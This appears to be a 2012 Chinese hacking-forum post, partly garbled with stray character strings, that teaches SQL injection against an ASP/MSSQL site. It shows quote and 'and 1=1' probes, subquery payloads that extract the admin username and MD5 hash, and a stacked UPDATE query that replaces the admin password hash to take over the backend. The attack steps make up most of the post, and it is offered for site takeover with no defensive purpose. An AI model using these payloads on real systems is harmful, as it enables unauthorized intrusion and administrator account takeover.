经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
" b" r* U. K2 l可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
$ x& ^- ^; I& Z测试如下:$ ^9 T. q3 e3 ?: r; V5 K) E& k
http://www.tmdsb.com/news.asp?id=121
' J ?: w2 Z$ ~" X在地址后输入单引号,显示
$ M* n# X6 L BMicrosoft OLE DB Provider for SQL Server 错误 ’80040e14’
! | r* b1 g2 R+ I# A: C# `- \字符串 ’’’ 之前有未闭合的引号" \+ I& P! Q0 `. y# N
/news/tmdws.asp,行63
1 O! o! D: v6 g6 a% J- M0 C" k说明没有过滤单引号且数据库是MSSQL. B, D4 F q& f( N# O. ?$ z
and 1=1正常。and 1=2出错。肯定存在注入
! m$ x# H# s, G4 a# ]1 g接着输入. v' U* p# g. g) T( x
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
& s. q2 p- G: Y得到帐号为:admin
6 N4 U3 p5 O! Phttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
7 Q% x7 J+ d. X2 w得到密码为:a4716077c2ba075c3 Y, O, J0 S- E0 v: |$ B
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
& @& |& H" s: B3 U& O9 O6 B, w' a8 A命令如下 :9 y, i. N2 Z5 e) G# b$ `
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–% j" b4 t1 p7 ~& W
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41